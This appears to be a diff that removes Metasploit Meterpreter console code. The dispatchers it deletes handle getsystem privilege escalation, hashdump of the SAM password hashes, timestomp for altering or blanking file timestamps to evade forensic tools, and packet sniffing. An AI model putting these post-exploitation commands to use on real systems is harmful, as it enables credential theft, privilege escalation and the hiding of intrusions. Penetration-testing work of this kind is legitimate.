- "Service - Named Pipe Impersonation (Dropper/Admin)",
29
- "Service - Token Duplication (In Memory/Admin)",
30
- "Exploit - KiTrap0D (In Memory/User)"
31
- ]
32
- #
33
- # List of supported commands.
34
- #
35
- def commands
36
- {
37
- "getsystem" => "Attempt to elevate your privilege to that of local system."
38
- }
39
- end
40
-
41
- #
42
- # Name for this dispatcher.
43
- #
44
- def name
45
- "Priv: Elevate"
46
- end
47
-
48
-
49
- #
50
- # Attempt to elevate the meterpreter to that of local system.
51
- #
52
- def cmd_getsystem( *args )
53
-
54
- technique = ELEVATE_TECHNIQUE_ANY
55
-
56
- desc = ""
57
- ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
58
-
59
- getsystem_opts = Rex::Parser::Arguments.new(
60
- "-h" => [ false, "Help Banner." ],
61
- "-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
62
- )
63
-
64
- getsystem_opts.parse(args) { | opt, idx, val |
65
- case opt
66
- when "-h"
67
- print_line( "Usage: getsystem [options]\n" )
68
- print_line( "Attempt to elevate your privilege to that of local system." )
69
- print_line( getsystem_opts.usage )
70
- return
71
- when "-t"
72
- technique = val.to_i
73
- end
74
- }
75
-
76
- if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
77
- print_error( "Technique '#{technique}' is out of range." );
78
- return false;
79
- end
80
-
81
- result = client.priv.getsystem( technique )
82
-
83
- # got system?
84
- if result[0]
85
- print_line( "...got system (via technique #{result[1]})." );
86
- else
87
- print_line( "...failed to get system." );
88
- end
89
-
90
- return result
91
- end
92
-
93
- end
94
-
95
- end
96
- end
97
- end
98
- end
@@ -1,51 +0,0 @@
1
- require 'rex/post/meterpreter'
2
-
3
- module Rex
4
- module Post
5
- module Meterpreter
6
- module Ui
7
-
8
- ###
9
- #
10
- # The password database portion of the privilege escalation extension.
11
- #
12
- ###
13
- class Console::CommandDispatcher::Priv::Passwd
14
-
15
- Klass = Console::CommandDispatcher::Priv::Passwd
16
-
17
- include Console::CommandDispatcher
18
-
19
- #
20
- # List of supported commands.
21
- #
22
- def commands
23
- {
24
- "hashdump" => "Dumps the contents of the SAM database"
25
- }
26
- end
27
-
28
- #
29
- # Name for this dispatcher.
30
- #
31
- def name
32
- "Priv: Password database"
33
- end
34
-
35
- #
36
- # Displays the contents of the SAM database
37
- #
38
- def cmd_hashdump(*args)
39
- client.priv.sam_hashes.each { |user|
40
- print_line("#{user}")
41
- }
42
-
43
- return true
44
- end
45
-
46
- end
47
-
48
- end
49
- end
50
- end
51
- end
@@ -1,132 +0,0 @@
1
- require 'rex/post/meterpreter'
2
-
3
- module Rex
4
- module Post
5
- module Meterpreter
6
- module Ui
7
-
8
- ###
9
- #
10
- # This class provides commands that interact with the timestomp feature set of
11
- # the privilege escalation extension.
12
- #
13
- ###
14
- class Console::CommandDispatcher::Priv::Timestomp
15
-
16
- Klass = Console::CommandDispatcher::Priv::Timestomp
17
-
18
- include Console::CommandDispatcher
19
-
20
- @@timestomp_opts = Rex::Parser::Arguments.new(
21
- "-m" => [ true, "Set the \"last written\" time of the file" ],
22
- "-a" => [ true, "Set the \"last accessed\" time of the file" ],
23
- "-c" => [ true, "Set the \"creation\" time of the file" ],
24
- "-e" => [ true, "Set the \"mft entry modified\" time of the file" ],
25
- "-z" => [ true, "Set all four attributes (MACE) of the file" ],
26
- "-f" => [ true, "Set the MACE of attributes equal to the supplied file" ],
27
- "-b" => [ false, "Set the MACE timestamps so that EnCase shows blanks" ],
28
- "-r" => [ false, "Set the MACE timestamps recursively on a directory" ],
29
- "-v" => [ false, "Display the UTC MACE values of the file" ],
30
- "-h" => [ false, "Help banner" ])
31
-
32
- #
33
- # List of supported commands.
34
- #
35
- def commands
36
- {
37
- "timestomp" => "Manipulate file MACE attributes"
38
- }
39
- end
40
-
41
- #
42
- # Name for this dispatcher.
43
- #
44
- def name
45
- "Priv: Timestomp"
46
- end
47
-
48
- #
49
- # This command provides the same level of features that vinnie's command
50
- # line timestomp interface provides with a similar argument set.
51
- #
52
- def cmd_timestomp(*args)
53
- if (args.length < 2)
54
- print_line("\nUsage: timestomp file_path OPTIONS\n" +
55
- @@timestomp_opts.usage)
56
- return
57
- end
58
-
59
- file_path = args.shift
60
- modified = nil
61
- accessed = nil
62
- creation = nil
63
- emodified = nil
64
-
65
- @@timestomp_opts.parse(args) { |opt, idx, val|
66
- case opt
67
- when "-m"
68
- modified = str_to_time(val)
69
- when "-a"
70
- accessed = str_to_time(val)
71
- when "-c"
72
- creation = str_to_time(val)
73
- when "-e"
74
- emodified = str_to_time(val)
75
- when "-z"
76
- puts "#{val}"
77
- modified = str_to_time(val)
78
- accessed = str_to_time(val)
79
- creation = str_to_time(val)
80
- emodified = str_to_time(val)
81
- when "-f"
82
- print_status("Setting MACE attributes on #{file_path} from #{val}")
83
- client.priv.fs.set_file_mace_from_file(file_path, val)
84
- when "-b"
85
- print_status("Blanking file MACE attributes on #{file_path}")
86
- client.priv.fs.blank_file_mace(file_path)
87
- when "-r"
88
- print_status("Blanking directory MACE attributes on #{file_path}")
89
- client.priv.fs.blank_directory_mace(file_path)
90
- when "-v"
91
- hash = client.priv.fs.get_file_mace(file_path)
92
-
93
- print_line("Modified : #{hash['Modified']}")
94
- print_line("Accessed : #{hash['Accessed']}")
95
- print_line("Created : #{hash['Created']}")
96
- print_line("Entry Modified: #{hash['Entry Modified']}")
97
- when "-h"
98
- print_line("\nUsage: timestomp file_path OPTIONS\n" +
99
- @@timestomp_opts.usage)
100
- return
101
- end
102
- }
103
-
104
- # If any one of the four times were specified, change them.
105
- if (modified or accessed or creation or emodified)
106
- print_status("Setting specific MACE attributes on #{file_path}")
107
- client.priv.fs.set_file_mace(file_path, modified, accessed,
108
- creation, emodified)
109
- end
110
- end
111
-
112
- protected
113
-
114
- #
115
- # Converts a date/time in the form of MM/DD/YYYY HH24:MI:SS
116
- #
117
- def str_to_time(str) # :nodoc:
118
- r, mon, day, year, hour, min, sec = str.match("^(\\d+?)/(\\d+?)/(\\d+?) (\\d+?):(\\d+?):(\\d+?)$").to_a
119
-
120
- if (mon == nil)
121
- raise ArgumentError, "Invalid date format, expected MM/DD/YYYY HH24:MI:SS (got #{str})"
122
- end
123
-
124
- Time.mktime(year, mon, day, hour, min, sec, 0)
125
- end
126
-
127
- end
128
-
129
- end
130
- end
131
- end
132
- end
@@ -1,187 +0,0 @@
1
- require 'rex/post/meterpreter'
2
-
3
- module Rex
4
- module Post
5
- module Meterpreter
6
- module Ui
7
-
8
- ###
9
- #
10
- # Packet sniffer extension user interface.
11
- #
12
- ###
13
- class Console::CommandDispatcher::Sniffer
14
-
15
- Klass = Console::CommandDispatcher::Sniffer
16
-
17
- include Console::CommandDispatcher
18
-
19
- #
20
- # Initializes an instance of the sniffer command interaction.
21
- #
22
- def initialize(shell)
23
- super
24
- end
25
-
26
- #
27
- # List of supported commands.
28
- #
29
- def commands
30
- {
31
- "sniffer_interfaces" => "Enumerate all sniffable network interfaces",
32
- "sniffer_start" => "Start packet capture on a specific interface",
33
- "sniffer_stop" => "Stop packet capture on a specific interface",
34
- "sniffer_stats" => "View statistics of an active capture",
35
- "sniffer_dump" => "Retrieve captured packet data to PCAP file",
36
- }
37
- end
38
-
39
-
40
- def cmd_sniffer_interfaces(*args)
41
-
42
- ifaces = client.sniffer.interfaces()
43
-
44
- print_line()
45
-
46
- ifaces.each do |i|
47
- print_line(sprintf("%d - '%s' ( type:%d mtu:%d usable:%s dhcp:%s wifi:%s )",
48
- i['idx'], i['description'],
49
- i['type'], i['mtu'], i['usable'], i['dhcp'], i['wireless'])
50
- )
51
- end
52
-
53
- print_line()
54
-
55
- return true
56
- end
57
-
58
- def cmd_sniffer_start(*args)
59
- intf = args.shift.to_i
60
- if (intf == 0)
61
- print_error("Usage: sniffer_start [interface-id] [packet-buffer (1-200000)] [bpf filter (posix meterpreter only)]")
62
- return
63
- end
64
- maxp = (args.shift || 50000).to_i
65
- bpf = args.join(" ")
66
-
67
- client.sniffer.capture_start(intf, maxp, bpf)
68
- print_status("Capture started on interface #{intf} (#{maxp} packet buffer)")
69
- return true
70
- end
71
-
72
- def cmd_sniffer_stop(*args)
73
- intf = args[0].to_i
74
- if (intf == 0)
75
- print_error("Usage: sniffer_stop [interface-id]")
76
- return
77
- end
78
-
79
- client.sniffer.capture_stop(intf)
80
- print_status("Capture stopped on interface #{intf}")
81
- return true
82
- end
83
-
84
- def cmd_sniffer_stats(*args)
85
- intf = args[0].to_i
86
- if (intf == 0)
87
- print_error("Usage: sniffer_stats [interface-id]")
88
- return
89
- end
90
-
91
- stats = client.sniffer.capture_stats(intf)
92
- print_status("Capture statistics for interface #{intf}")
93
- stats.each_key do |k|
94
- puts "\t#{k}: #{stats[k]}"
95
- end
96
-
97
- return true
98
- end
99
-
100
- def cmd_sniffer_dump(*args)
101
- intf = args[0].to_i
102
- if (intf == 0 or not args[1])
103
- print_error("Usage: sniffer_dump [interface-id] [pcap-file]")
104
- return
105
- end
106
-
107
- path_cap = args[1]
108
- path_raw = args[1] + '.raw'
109
-
110
- fd = ::File.new(path_raw, 'wb+')
111
-
112
- print_status("Flushing packet capture buffer for interface #{intf}...")
113
- res = client.sniffer.capture_dump(intf)
114
- print_status("Flushed #{res[:packets]} packets (#{res[:bytes]} bytes)")
115
-
116
- bytes_all = res[:bytes] || 0
117
- bytes_got = 0
118
- bytes_pct = 0
119
-
120
- while (bytes_all > 0)
121
- res = client.sniffer.capture_dump_read(intf,1024*512)
122
-
123
- bytes_got += res[:bytes]
124
-
125
- pct = ((bytes_got.to_f / bytes_all.to_f) * 100).to_i
126
- if(pct > bytes_pct)
127
- print_status("Downloaded #{"%.3d" % pct}% (#{bytes_got}/#{bytes_all})...")
128
- bytes_pct = pct
129
- end
130
- break if res[:bytes] == 0
131
- fd.write(res[:data])
132
- end
133
-
134
- fd.close
135
-
136
- print_status("Download completed, converting to PCAP...")
137
-
138
- fd = nil
139
- if(::File.exist?(path_cap))
140
- fd = ::File.new(path_cap, 'ab+')
141
- else
142
- fd = ::File.new(path_cap, 'wb+')
143
- fd.write([0xa1b2c3d4, 2, 4, 0, 0, 65536, 1].pack('NnnNNNN'))
144
- end
145
-
146
- pkts = {}
147
- od = ::File.new(path_raw, 'rb')
148
-
149
-
150
- # TODO: reorder packets based on the ID (only an issue if the buffer wraps)
151
- while(true)
152
- buf = od.read(20)
153
- break if not buf
154
-
155
- idh,idl,thi,tlo,len = buf.unpack('N5')
156
- break if not len
157
- if(len > 10000)
158
- print_error("Corrupted packet data (length:#{len})")
159
- break
160
- end
161
-
162
- pkt_id = (idh << 32) +idl
163
- pkt_ts = Rex::Proto::SMB::Utils.time_smb_to_unix(thi,tlo)
164
- pkt = od.read(len)
165
-
166
- fd.write([pkt_ts,0,len,len].pack('NNNN')+pkt)
167
- end
168
- od.close
169
- fd.close
170
-
171
- ::File.unlink(path_raw)
172
- print_status("PCAP file written to #{path_cap}")
173
- end
174
-
175
- #
176
- # Name for this dispatcher
177
- # sni
178
- def name
179
- "Sniffer"
180
- end
181
-
182
- end
183
-
184
- end
185
- end
186
- end
187
- end